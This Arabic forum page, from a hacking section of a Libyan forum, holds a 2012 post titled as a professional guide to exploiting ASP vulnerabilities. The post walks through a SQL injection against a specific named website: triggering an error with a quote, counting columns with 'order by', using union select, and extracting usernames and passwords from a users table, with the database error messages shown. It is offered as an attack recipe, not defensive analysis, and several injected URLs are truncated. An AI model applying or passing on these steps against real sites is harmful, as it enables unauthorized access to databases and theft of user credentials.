اهلا بكم في منتديات ليبيا الحره
اهلا و سهلا بك زئرنا الكريم
نرجو منك ان تسجل او تظغط علي دخول اذا كان لديك حساب
هنا سنعمل يد بيد لاشهار المنتدي

اهلا بكم في منتديات ليبيا الحره

الرئيسيةالبوابةاليوميةس .و .جبحـثالأعضاءالمجموعاتالتسجيلدخول
اهلا و سهلا بكم اعضاء المنتدي الكرام نرحب بكم في منتديات ليبيا الحره و نتمني لكم وقتا سعيدا عاشت ليبيا حره
المتواجدون الآن ؟
ككل هناك 1 عُضو حالياً في هذا المنتدى :: 0 عضو مُسجل, 0 عُضو مُختفي و 1 زائر

لا أحد

أكبر عدد للأعضاء المتواجدين في هذا المنتدى في نفس الوقت كان 38 بتاريخ الخميس يونيو 07, 2012 8:47 am
احصائيات
هذا المنتدى يتوفر على 1013 عُضو.
آخر عُضو مُسجل هو high*voltage فمرحباً به.

أعضاؤنا قدموا 1903 مساهمة في هذا المنتدى في 1624 موضوع
بحـث
 
 

نتائج البحث
 
Rechercher بحث متقدم
أفضل 10 أعضاء في هذا المنتدى
هبه الشاذلي
 
انوش الشريره
 
م مهاب
 
شروق صقر
 
امين م ق
 
ندى الجندى
 
Anas
 
asmaa_zz
 
م ايناس
 
حسينم
 
أفضل 10 أعضاء في هذا الشهر
أفضل 10 أعضاء في هذا الأسبوع
سحابة الكلمات الدلالية
المواضيع الأخيرة
» ابوبكر يونس جابركيف نقيمه الان بعد 6 سنوات
الجمعة يناير 27, 2017 2:55 pm من طرف امين م ق

» الطفل الليبى يحى طبق الاصل من والده
الأربعاء نوفمبر 09, 2016 5:26 am من طرف امين م ق

» المكتب التنفيذى مجلس وزراء العمل ومجلس وزراء الشئون الاجتماعية-بدول مجلس التعاون لدول الخليج يعقد المؤتمر العربي السابع (تكنولوجيا الموارد البشرية. انفرادية الرؤية)
الأحد أكتوبر 02, 2016 1:43 pm من طرف محمد أحمد سويلم

» دوره مهارات تدقيق وضبط مخاطر الاحتياجات المالي ( بروتيك لحلول التدريب والاستشارات )‏
السبت يوليو 16, 2016 4:40 am من طرف هبه الشاذلي

» دوره إدارة العلاقات العامة الدولية برؤي معاصرة ( بروتيك لحلول التدريب والاستشارات )‏
الخميس يوليو 14, 2016 3:38 am من طرف هبه الشاذلي

» دوره مهارات وفنون التسويق والترويج عبر الهاتف ( بروتيك لحلول التدريب والاستشارات )‏
الأحد يونيو 26, 2016 7:38 pm من طرف هبه الشاذلي

» دوره برنامج الاداء الراقي المتميز للخدمة في المطارات ( بروتيك لحلول التدريب والاستشارات )‏
الإثنين مايو 16, 2016 7:24 am من طرف هبه الشاذلي

» دوره الامان الصناعي والسلامة المهنية وهندسة البيئة ( بروتيك لحلول التدريب والاستشارات )‏
الأربعاء مايو 11, 2016 12:16 pm من طرف هبه الشاذلي

» دوره التنمية الذاتية والمهنية للعاملين في النظام الصحي وجودة الخدمة ( بروتيك لحلول التدريب ‏والاستشارات )‏
الأربعاء مايو 11, 2016 3:10 am من طرف هبه الشاذلي

ازرار التصفُّح
 البوابة
 الرئيسية
 قائمة الاعضاء
 البيانات الشخصية
 س .و .ج
 بحـث

شاطر | 
 

  شرح استغلال ثغرات Asp باحتراف ..

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
قاتل مأجور
عضو جديد
عضو جديد
avatar

الجنس : ذكر عدد المساهمات : 6
نقاط : 7044
السٌّمعَة : 0
تاريخ الميلاد : 17/05/1991
تاريخ التسجيل : 24/12/2012
العمر : 26
البلاد البلاد : ليبيا
الإقامه : طرابلس
العمل/الترفيه العمل/الترفيه : طرابلس
تعاليق : تكلم لنا عن اي شئ تحب

مُساهمةموضوع: شرح استغلال ثغرات Asp باحتراف ..   الإثنين ديسمبر 24, 2012 3:25 pm

السلام عليكم ورحمة الله وبركاته

اليوم قررت اعمل لكم شرح عن استغلال ثغرات asp ..
هذه البرمجة نادرة الاستخدام الا فى المواقع الكبيرة مثل البنوك والشركات ..

ساشرح لكم كيفية استغلال خطأ sql تابع معى ..

انا ساشرج لكم على موقع http://www.haybersqlogretiyo.com

المنطقة المصابة بثغرة sql نضع بعد الرابط وبعد المتغير علامة " او '
http://www.haybersqlogretiyo.com/baskabibolum.asp?id=10"


يظهر لنا الخطأ التالى :
الكود:

Microsoft JET Database Engine error ’80040e14’
Syntax error in string in query expression ’id = 10";’.
/baskabirbolum.asp, line 7 
الان نبدا نعد بالاعمدة للوصول الى العمود المطلوب
http://www.haybersqlogretiyo.com/bas...=10+order+by+1

الان عند الوصول الى العمود المصاب وهو 10
http://www.haybersqlogretiyo.com/bas...10+order+by+10

يظهر الخطأ التالى :

الكود:

Microsoft JET Database Engine error ’80040e14’
The Microsoft Jet database engine does not recognize ’10’ as a valid field name or expression.
/news.asp, line 7[/list] 

ويكون العمود المصاب الرقم 8
http://www.haybersqlogretiyo.com/bas...=10+order+by+8



http://www.haybersqlogretiyo.com/bas...2,3,4,5,6, 7--

الان عند الوصول الى الرقم 7 يظهر لنا هذا الخطا وبداخله اسم القاعدة
كود PHP:
الكود:

[list=1][*]Microsoft JET Database Engine error ’80040e37’
The Microsoft Jet database engine cannot find the input table or query ’hayber’. Make sure it exists and that its name is spelled correctly.
/baskabirbolum.asp, line 7 [/list]

ويتم استغلالها .
http://www.haybersqlogretiyo.com/bas... 7+from+hayber

والان نظهر اسم اليوزر والباس
http://www.haybersqlogretiyo.com/bas...6,7+from+users


تم الموضوع بحمد الله خوكم قاتل مأجور
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
 
شرح استغلال ثغرات Asp باحتراف ..
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
اهلا بكم في منتديات ليبيا الحره :: قسم الأختراق لأقوياء الهكر :: برامج اختراق الكمبيوتر-
انتقل الى: